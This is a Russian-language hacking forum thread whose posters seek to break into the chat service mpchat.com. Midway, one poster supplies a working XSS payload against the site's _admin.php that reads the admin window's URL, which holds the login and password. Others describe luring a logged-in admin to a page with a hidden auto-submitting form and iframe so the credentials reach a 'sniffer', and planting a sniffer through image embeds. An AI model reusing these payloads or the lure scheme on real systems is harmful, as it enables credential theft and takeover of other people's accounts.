кто взламывал Mpchat.com?

На сайте mpchat.com сервис чатов, там админка крутая должнобыть много дыр, кто нибуть взламывал там чаты? )

 

Сервис дырявый - однозначно ...
Все хожу вокруг, да около ...
Нужно исходить из cgi-багов ....

 

Вот недостатки, которые я нашел:
1)Смена пароля происходит без запроса старого. Сейчас работаю над формированием этого запроса.
2)В скрытом фрейме можно увидеть пароль администратора

 

Ищи чат с гестой, где разрешены вставки картинок, вставляй наш сниффер, и когда админ просмотрит сообщение, то считай, что чат взломан ...

 

Чёт я непонял,
1. причём там cgi если там пхп...
2. там замена пароля только если ты уже зашёл под правильным паролем, темболее высылка пароля на емаил админа который менять вроде вообще нельзя ;((
3. в каком скрытом фрэйме пароль админа?
4. и что такое ваш сниффер?

Вообще можно там как нить напакастить в чате, типо там писать своим шрифтом? или яву скрипт выполнить ... типо закидать окнами ??

 

Блин чё нельзя ничего сделать чтоль?

 

Если этот сайт (antichat.ru) просмотреть не можешь, то ниче с тем чатом нельзя сделать  

 

Да я прочитал, просто неверится что там дыр нету...

 

Есть там дыры ...

 

TO ЧЕ ГЕВАРА а нет там дыр!!! ХАХА

 

я нашел xss в одной из страниц этого портала

этот баг позволяет собрать страницу, которая (после открытия ее жертвой) уводит логин и пароль админа (если была открыта админка) или уводит логин и идентификатор пользователя в чате

если кому интересно могу дать сорцы =)

 

Где там xss ?

 

код для теста xss
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><form action="http://mpchat.com/_admin.php" target="_blank">
<textarea cols="50" rows="5" name="chat" id="chat">z style=`background:url(javascript:alert())`</textarea><br>
<input type="submit">
</form>[/QUOTE]<span id='postcolor'>

если зайти в админку
и открыть страницу с выше указаным кодом
потом заменить в поле alert() на
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">document.write(unescape(/%3Cimg%20src=%22javascript:z=window.open(%27%27,%27administration%27)%3Balert(z.document.location)%3B%22%3E/))[/QUOTE]<span id='postcolor'>
и послать форму

то в новом окне откроется страница c xss иньекцией, которая обратится в окно с именем administration (а именно в нем и открывается админка) и покажет url (а в нем логин и пароль)

 

Подожди .. Эти действия нельзя произвести без прав администратора ... Или я что-то не вдогнал ...

 

некто вася зарегил свой чат открыл окно админки

некто петя просит посетить его сайт
(к сожелению xss пасивный, т.е. необходимо заманить пользователя)

на сайте пети есть невидимая форма с на подобие моего примера, которая автоматический отправляется в скрытый iframe

в результате его логин и пароль уходят, к примеру на снифер

 

Ну вы ребят даёте, такие сложные комбинации чтобы взломать пароль администратора, необходимо заманить его на этот код, помоему так хоть что можно взломать зная структуру, а пароль он всеравно себе вернёт, можно конечно попробовать и только немного напакостить

 

Народ, а с чего нужно начинать чтобы кумекать с вами на ровне? (т-е хаком)

 

Не думаю я, чтомы говорим о чем-то сверхсложном ...

Все приходит со временем ...

 

Эт сново я,
похоже всёже ктоко круто поломал мпчата, но так и неизвестно кто.
По форуму сервиса видно что сам антиадмин.ру заходил и поломал там пару чатов различным способами.

Но вроде и ещё ктото приходил и уложил весь сервак на 2 недели в сон
Вообщем щас там востановительные работы.
Короче кто что знает по этому поводу напишите как ломается &nbsp;

 

Т.е. не антиадмин, а админ античат.ру